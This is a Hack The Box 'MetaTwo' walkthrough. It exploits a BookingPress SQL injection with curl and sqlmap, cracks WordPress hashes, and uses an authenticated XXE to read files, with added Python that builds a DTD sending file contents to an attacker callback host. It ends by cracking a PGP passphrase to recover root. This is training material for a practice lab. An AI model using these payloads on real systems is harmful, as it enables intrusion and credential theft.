[HTB] : MetaTwo Walkthrough
Initial Recon:
From the initial enumeration we can tell that the website runs WordPress. So I first ran wpscan with an API key and got dozens of vulnerabilities; one of them was interesting because it had a public exploit that could give us an initial foothold: an SQL injection in the BookingPress plugin, reachable through admin-ajax.php without logging in.
wpscan --url http://metapress.htb/ --plugins-detection mixed -e ap,at --api-token <token_here> | tee wpscan.txt
curl -i 'https://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category_id=33&total_service=1' \
  --proxy http://127.0.0.1:8080
Here the "_wpnonce" value must be replaced with the one embedded in the website's own page source (the page that loads the booking form); the action rejects requests that do not carry a valid nonce, so the server only accepts the request when it looks like it came from the site itself.
After that I sent the request to sqlmap to enumerate the database content.
sqlmap -r req.txt -p total_service --dbs --dump
sqlmap -r req.txt -D blog --tables
sqlmap -r req.txt -D blog -T wp_users --dump
Dumping wp_users gave me the WordPress users' password hashes.
I passed a hash to hashid to identify the format (WordPress phpass, hashcat mode 400) and cracked the manager account's hash, which gave access to the WordPress dashboard.
hashcat -a 0 -m 400 -o crack.txt hash.txt /usr/share/wordlists/rockyou.txt
Going through the wpscan results, we had found that the site is vulnerable to an authenticated XXE (https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357). So I had to craft a malicious DTD (evil.dtd) and get the server to parse it through a file uploaded via the WordPress media manager; whenever the server parsed the upload, we could read arbitrary files from the web server.
Next we had to find the location of wp-config.php on the web server. Since the site was served by nginx, I changed the file path in evil.dtd to "/etc/nginx/sites-enabled/default", which revealed the WordPress installation directory "/var/www/metapress.htb/blog", and then read wp-config.php itself, which contained the FTP password.
On the FTP server, the file send_email.php contained a credential that worked for SSH login.
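The XXE step above has three parts: the external DTD that makes the parser read a file, the callback that carries the content back to us, and finding the `root` directive in the recovered nginx config so we know where wp-config.php lives. The code below is an added example written for this page, not the author's evil.dtd or a script from the box. It assumes the common php://filter base64 trick for the read (the page does not show the DTD body), a callback URL of `http://10.10.14.5:8000` as a stand-in for the attacker's listener, and a constructed nginx config whose `root` line matches the directory found above.

```python
import base64
import re
from urllib.parse import unquote, urlparse


def build_dtd(target_file: str, callback: str) -> str:
    """External DTD for an out-of-band XXE file read (assumed technique).

    %file reads the target through php://filter so content with newlines,
    '<' or '&' survives as base64 instead of breaking the XML; %init declares
    a second parameter entity whose SYSTEM URL carries the encoded content to
    the callback host. &#x25; is '%' escaped, as required inside an entity value.
    """
    return "\n".join([
        f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={target_file}">',
        f'<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM \'{callback}/?p=%file;\'>">',
        "%init;",
        "%trick;",
        "",
    ])


def decode_exfil(request_line: str) -> str:
    """Recover the file from the 'GET /?p=<base64> HTTP/1.1' line the victim sent us.

    parse_qs is deliberately avoided: it turns '+' into a space and silently
    corrupts base64. Missing '=' padding is also restored, since some
    listeners log the URL with it stripped.
    """
    path = request_line.split()[1]
    query = urlparse(path).query
    raw = unquote(query.split("p=", 1)[1].split("&", 1)[0])
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode()


def nginx_roots(config: str) -> list[str]:
    """All 'root' directives in an nginx config, in order of appearance."""
    return re.findall(r"^\s*root\s+([^;]+);", config, re.MULTILINE)


def wp_config_candidates(config: str) -> list[str]:
    """Where wp-config.php should sit for each document root."""
    return [r.strip().rstrip("/") + "/wp-config.php" for r in nginx_roots(config)]


# Constructed sample of /etc/nginx/sites-enabled/default; the root path is the
# one recovered in the walkthrough, everything else is made up.
SAMPLE_NGINX_CONFIG = """server {
    listen 80;
    server_name metapress.htb;
    root /var/www/metapress.htb/blog;
    index index.php;
    location ~ \\.php$ {
        fastcgi_pass unix:/run/php/php8.0-fpm.sock;
    }
}
"""

# Constructed callback line, built the way the DTD above would produce it.
SAMPLE_CALLBACK = (
    "GET /?p=" + base64.b64encode(SAMPLE_NGINX_CONFIG.encode()).decode() + " HTTP/1.1"
)

if __name__ == "__main__":
    print(build_dtd("/etc/nginx/sites-enabled/default", "http://10.10.14.5:8000"))
    recovered = decode_exfil(SAMPLE_CALLBACK)
    print(wp_config_candidates(recovered))   # ['/var/www/metapress.htb/blog/wp-config.php']
```

Once the config is recovered, the same DTD with the `resource=` path swapped for the wp-config.php candidate is all that is needed for the second read; nothing else in the payload changes.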
Digging through the files of user jnelson, I found a passpie directory containing the root password, stored encrypted with a PGP key. Passpie is a command line tool to manage passwords from the terminal with a colorful and configurable interface.
I first converted the PGP private key to John format with gpg2john and then cracked its passphrase.
Finally, using the cracked passphrase with passpie, I recovered the root password.